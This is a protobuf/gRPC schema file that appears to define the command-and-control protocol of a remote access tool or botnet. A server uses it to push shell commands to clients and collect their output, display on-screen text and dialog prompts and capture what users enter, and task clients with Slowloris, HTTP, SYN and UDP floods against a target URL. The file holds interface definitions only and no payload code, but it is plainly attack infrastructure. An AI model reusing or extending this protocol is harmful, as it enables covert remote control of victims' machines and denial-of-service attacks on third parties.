ClientData.proto

syntax = "proto3";

package pb;

option go_package="./pb";


message ClientOnScreenData {
    bool ShouldUpdate = 1;
    string OnScreenText = 2;
}

message ClientExecData {
    bool ShouldExec = 1;
    string Command = 2;
}

message ClientExecOutput {
    ClientDataRequest id = 1;
    bytes output = 2;
}

message Void {}

message FloodData { 
    bool ShouldFlood = 1;
    int32 floodType =2; // 0 = Slowloris, 1 = Httpflood, 2 = Synflood, 3 = Updflood
    string url = 3;
    int64 limit = 4;
    int64 num_threads = 5;
}

message DialogData {
    bool shouldShowDialog = 1;
    string DialogPrompt = 2;
    string DialogTitle = 3;
}

message DialogOutput { 
    string EntryText = 1;
    ClientDataRequest id = 2;
}

message ClientDataRequest { string client_id = 1; }

message ClientDataOnScreenTextResponse { ClientOnScreenData on_screen = 1; }


service Consumer {
    rpc SubscribeOnScreenText(ClientDataRequest) returns (stream ClientDataOnScreenTextResponse);
    rpc GetCommand(ClientDataRequest) returns (ClientExecData);
    rpc SetCommandOutput(ClientExecOutput) returns (Void);
    rpc GetFlood(Void) returns (FloodData);
    rpc GetDialog(ClientDataRequest) returns (DialogData);
    rpc SetDialogOutput(DialogOutput) returns (Void);
}